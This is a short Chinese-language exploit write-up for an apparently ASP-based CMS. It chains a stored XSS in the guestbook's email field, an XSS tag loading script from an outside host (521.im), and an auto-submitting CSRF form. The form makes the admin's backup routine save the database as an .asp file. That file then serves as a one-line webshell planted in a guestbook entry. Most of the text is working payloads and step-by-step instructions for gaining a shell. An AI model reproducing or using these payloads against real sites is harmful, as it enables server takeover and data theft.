未对Book.asp邮箱等处进行符号转义,导致XSS跨站执行漏洞。
------GetShell-----
[1] 在Book.asp的邮箱处填写一句话,提交 [2] 在Book.asp的邮箱处填写XSS语句中的CSRF [3] 等待管理员触发XSS语句,然后一句话连接bem.asp [要求] 默认后台管理目录/数据库 [注意] 管理触发XSS是在后台查看留言
------ X S S -----
Book.asp 在邮箱里处写入XSS语句即可 用XSS调用CSRF,例如把CSRF去转成JS的则用 <SCRIPT SRC=http://521.im/xss.js></SCRIPT>
----- CSRF -----
<form method="post" action="http://127.0.0.1:99/admin/DataM.asp?eims=Data&Action=bfstart"> <input name="olddata" type="text" id="olddata" value="../Data/eimsCMS.mdb" size="45" readonly> <input name="newdata" type="text" id="newdata" size="45" value="../bem.asp"> <input type="submit" name="Submit" value="开始备份" id="bem"/> </form> <script> document.getElementByIdx_x('bem').click(); </script>
----- 分析 -----
未对Book.asp邮箱等处进行符号转义 未过滤提交语句
作者:B0mbErM@n
|